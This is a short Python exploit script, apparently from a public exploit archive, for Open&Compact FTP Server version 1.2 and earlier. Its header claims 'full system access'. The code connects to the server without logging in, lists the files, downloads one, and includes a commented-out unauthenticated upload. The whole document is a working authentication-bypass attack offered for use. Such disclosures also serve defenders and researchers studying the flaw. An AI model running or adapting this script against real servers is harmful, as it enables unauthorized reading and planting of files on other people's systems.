37 lines
No EOL
1.2 KiB
Python
Executable file
37 lines
No EOL
1.2 KiB
Python
Executable file
# Exploit Title: Open&Compact Ftp Server <= 1.2 Full System Access
|
|
# Date: June 12, 2010
|
|
# Author: Serge Gorbunov
|
|
# Software Link: http://sourceforge.net/projects/open-ftpd/
|
|
# Version: <= 1.2
|
|
# Tested on: Windows 7, Windows XP SP3
|
|
#!/usr/bin/python
|
|
|
|
# Simply by omitting login process to the open ftp server it is possible
|
|
# to execute any command, including but not limited to: listing files,
|
|
# retrieving files, storing files.
|
|
# Below is an example of a few commands.
|
|
# If you want to test storing files with no authentication, create a
|
|
# test file and uncomment out line with ftp.storbinary function call.
|
|
|
|
# Any command will work as long as there is at least on user who has the permission
|
|
# to execute that command. For example, storing files will work as long
|
|
# as there is one user with write permission. No matter whom it is.
|
|
|
|
import ftplib
|
|
import os
|
|
|
|
# Connect to server
|
|
ftp = ftplib.FTP( "127.0.0.1" )
|
|
ftp.set_pasv( False )
|
|
|
|
# Note that we need no authentication at all!!
|
|
|
|
print ftp.retrlines( 'LIST' )
|
|
print ftp.retrbinary('RETR changelog.txt', open('changelog.txt', 'wb').write )
|
|
|
|
# filename = 'test.txt'
|
|
# f = open( filename, 'rb' )
|
|
# print ftp.storbinary( 'STOR ' + filename, f )
|
|
# f.close()
|
|
|
|
ftp.quit() |